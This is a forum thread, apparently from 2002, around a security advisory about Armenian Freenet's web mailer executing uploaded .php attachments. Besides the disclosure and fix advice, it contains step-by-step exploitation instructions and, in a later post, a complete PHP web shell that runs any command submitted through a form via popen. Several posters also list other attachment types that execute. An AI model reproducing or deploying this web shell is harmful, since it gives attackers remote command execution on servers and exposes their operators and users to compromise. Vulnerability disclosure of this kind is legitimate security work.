Armenian Freenet web based mailer security flaw

[VX]

Armenian Freenet web based mailer security flaw
(software design bug)

VX Advisory #0002

0Originally Discovered by Vahram Igityan <vx@web.am> @ 20020708

0DESCRIPTION
Armenian Freenet is the most popular free mail and hosting server in Armenia.
And it's web based mailer is part ot their free service located at http://email.freenet.am.

0OVERVIEW
Users on Armenian Freenet can execute any type of PHP code.

0DETAILS
When user is viewing his/her attachment its' beeing saved on server's disk in uniquie
directory and beeing getted by browser, so if you attach .php file, it will be parsed
by server.

0EXPLOIT
Write code like <? phpinfo();?> ,attach it and send to freenet account, the open youre
inbox using their web based mailer and -=enjoy=-

0SOLUTION
Rewrite the part of attachemt viewing code, use directory outside the DocumentRoot and show
attch by opening and dumping a file.
---eof--

[Eddi]

lol

Mne prosto interesno, est' li takoj tip attachmenta, kotoryj imeet smysl takim obrazom pokazyvat' (dage html ya by tak ne pokazyval)..

Nice discovery!

[strax.]

LoL

[VX]

And here is a proof exploit code ))

Code:

<?
function fo(){
?>
<BODY>
<FORM>
<INPUT TYPE=TEXT NAME=cmd VALUE=&quot;ls&quot;>
<INPUT TYPE=SUBMIT NAME=&quot;ss&quot; VALUE=&quot;bb&quot;>
</FORM>
</BODY>
<?
}

if (!isset($ss)){
	fo();
}else
{	
echo &quot;<PRE>\n&quot;;
	$pi = popen(&quot;$cmd&quot;,&quot;r&quot;);
		while ( ! feof($pi))
			print fgets($pi,512);
	pclose($pi);
echo &quot;</PRE>\n&quot;;
}
?>

[Eddi]

Nothing else to say!
Nice job! And a really funny one! I bet fn-ovskij admin etot forum ne chitaet, tak chto eto delo esche dolgo budet available..

[strax.]

2 VX
misht vor senc luj ben es gtnu, arajin@ sysadmin asa, te che es drutyamb 1000avor userner kan fn-um.
mekn el xixch@ korcni u ....

vobshem ti mokodec!!! bayc anpayman skzbic adminin asa, ete iharke der ches asel

[VX]

Quote:

Originally posted by strax.:
2 VX
misht vor senc luj ben es gtnu, arajin@ sysadmin asa, te che es drutyamb 1000avor userner kan fn-um.
mekn el xixch@ korcni u ....

vobshem ti mokodec!!! bayc anpayman skzbic adminin asa, ete iharke der ches asel

Vendor was already notofyed...
But no ansewer getted

[VX]

Admin replyed...
He's very nice person

[Eddi]

Hmm.. Ne znayu kak eto vyrazit' v slovax no eto chto-to..
ANY file, kotoryj on znaet kak zapuskat', mailer zapuskaet v sebe, eto vklyuchaet php, cgi (tut malen'kie problemy s privilege-ami, no eto erunda), asp i tak dalee..
Eto prosto koshmar!

Plus file-y bez rasshireniya po neizvestnym prichinam pereimenovyvaet v file.txt i voobsche rabotaet prosto potryasno

2 VX:
Nadeyus' Tigran eto vse ponyal.. Emu nado voobsche prikryt' web-email poka on ego ne ispravit, esli emu freenet dorog ili ge ego rabota.

[Eddi]

2 VX
Eto Tigran tipa "zakryl" php, ostaviv vse ostal'noe??
Interesnyj chelovek

By the way naschet asp ya kagetsya nedosmotrel normal'no, ne ponimaet vrode by, no .c file-y ne pokazyvaet, opyat' taki vidno pytaetsya zapustit' u sebya i ne poluchaet privilegij ( similar to cgi )

[VX]

DA, on imenno zakryil
Xot' teper' "naglo" vzlomat' ne smogut

[Amph]

VX, чего не отвечаешь на пЫсма?
Свяжись со мной как-нить...

[Mono]

Dzec !!